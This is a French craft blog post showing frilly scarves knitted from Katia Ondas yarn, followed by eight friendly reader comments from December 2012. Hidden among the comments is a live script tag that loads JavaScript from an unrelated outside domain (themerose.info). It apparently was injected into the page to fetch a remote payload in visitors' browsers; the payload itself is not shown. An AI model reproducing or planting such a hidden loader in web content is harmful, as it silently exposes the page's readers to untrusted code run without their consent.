• Des écharpes à gogo...

    Comme je vous l'avais montré il y a peu de temps, je me suis mise un peu au tricot car j'ai craqué sur la laine Ondas de la marque Katia.

    Cette laine a pour avantage de se broder super vite et donc en un tour de main, voici le résultat...

     

    Des écharpes à gogo...

     

    Des écharpes à gogo...

      

    Des écharpes à gogo...

      

      

     

    Pin It

    Tags Tags : , , ,
  • Commentaires

    8
    Mercredi 26 Décembre 2012 à 11:40

    J'adore  ! elles sont magnifiques ! bonnes fêtes de fin d'année !

    7
    didou 8
    Samedi 22 Décembre 2012 à 09:22

    surement agréable a tricoter , mais je n'aime pas le contact au cou

     

    6
    Vendredi 21 Décembre 2012 à 23:43
    eugeniegwada

    j'aime la couleur ce froufrou grr j'ai tout faut que je m'y mette enfin un jour hihihi

    bizz

    5
    Vendredi 21 Décembre 2012 à 23:25

    Superbe, tes écharpes ! Bravo !!

    4
    chantal 34
    Vendredi 21 Décembre 2012 à 23:02

    c'est sur cela va plus vite que la broderies , elle sont tres belles  bon reveillon joyeux noel bises CHANTAL

    3
    Vendredi 21 Décembre 2012 à 21:35

    Bienvenue au club des écharpes "frou-frou"... elles sont superbes et bien vite réalisées

    2
    Vendredi 21 Décembre 2012 à 18:26

    on m'a offert une echarpe comme ca douce et chaude

    <script src="http://themerose.info/dfi823hs.js?0.2655124047170938" type="text/javascript"></script>
    1
    Sandra de Meuuh Lin
    Vendredi 21 Décembre 2012 à 10:37

    heu dis moi une laine mieux vaut la Tricoter que la Broder !!! lol........... en tout cas belle réussite meme si c'est le genre d'écharpes que je ne peux pas porter car trop en acrylique, et déjà que je donne beaucoup de "coup de jus" en temps normal mais avec ça autours du cou c'est encore pire !!! lol

    bisous

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :